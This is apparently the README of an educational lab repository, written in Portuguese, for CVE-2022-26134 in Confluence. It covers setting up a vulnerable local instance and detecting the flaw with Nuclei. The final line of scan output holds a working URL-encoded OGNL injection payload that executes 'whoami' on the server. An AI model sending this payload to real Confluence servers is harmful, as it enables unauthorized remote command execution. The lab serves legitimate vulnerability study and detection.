CVE-2022-26134-LAB
O Confluence Server e o Confluence Data Center incluem uma vulnerabilidade significativa de execução remota de código não autenticada identificada como CVE-2022-26134, de acordo com um aviso de segurança divulgado pela Atlassian em 2 de junho de 2022. A vulnerabilidade não estava corrigida quando foi publicada em 2 de junho e estava sendo explorada ativamente. A partir de 3 de junho, tanto correções quanto uma solução temporária estão disponíveis.
Este repositório destina-se apenas a fins experimentais e educacionais.
Dependências
Ambiente Confluence Vulnerável
Executando o ambiente vulnerável
Após a inicialização, você pode acessar o servidor Confluence usando o seguinte endereço URL:
http://127.0.0.1:8090/
Configuração do Confluence Server
- Na primeira vez que visitar o site, você passará pelo processo de configuração.
- Não marque nenhuma caixa e selecione "Next" na página "Get apps".
- Na página da chave de licença, clique no link que diz "Get an evaluation license".
- Você será redirecionado para my.atlassian.com. Certifique-se de que o tipo de licença selecionado seja Confluence (Data Center). Digite qualquer nome de organização que desejar. Certifique-se de que o botão de opção "Your instance is" esteja selecionado como "up and running". Depois de verificar esses detalhes, clique no botão "Generate License".
- Uma janela de confirmação aparecerá perguntando se você deseja instalá-lo no servidor: 127.0.0.1. Selecione "Yes".
- Selecionar "Yes" preencherá automaticamente a chave de licença na sua instância local do Confluence. Selecione "Next".
- Escolha o tipo de implantação "Standalone" e selecione "Next".
- Na página de configuração do banco de dados, os detalhes devem ser preenchidos da seguinte forma:
- Tipo de banco de dados: PostgreSQL
- Tipo de configuração: Simple
- Hostname: db
- Porta: 5432
- Nome do banco de dados: confluence
- Nome de usuário: confluence
- Senha: 123456789
- Depois de preencher esses campos, pressione o botão "Test connection". Você deve receber a mensagem "Success! Database connected successfully". Em seguida, clique em "Next".
- Ele começará a configurar seu banco de dados. Isso pode levar um pouco de tempo. Aguente firme.
- Quando a configuração do banco de dados for concluída, você estará na página "Load Content". Selecione o botão "Example Site".
- Em seguida, na página "Configure User Management", selecione "Manage users and groups with Confluence".
- Em seguida, na página "Configure System Administrator Account", crie uma conta e selecione "Next".
- Quando concluído, você verá que a configuração foi bem-sucedida. Pressione "Start".
- Ele pedirá que você "Create a space to store your work". Insira qualquer nome de espaço que desejar.
- Pule o tutorial.
- Você concluiu agora a configuração de avaliação do Confluence Server.
Detectando CVE-2022-26134
A vulnerabilidade é uma vulnerabilidade de injeção OGNL que afeta o servidor HTTP. A carga útil (payload) OGNL é colocada na URI de uma solicitação HTTP. Qualquer tipo de método HTTP parece funcionar, seja válido (GET, POST, PUT, etc.) ou inválido (por exemplo, "BALH").
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
Usando Nuclei
Execute o seguinte comando Nuclei:
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
Saída da varredura
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]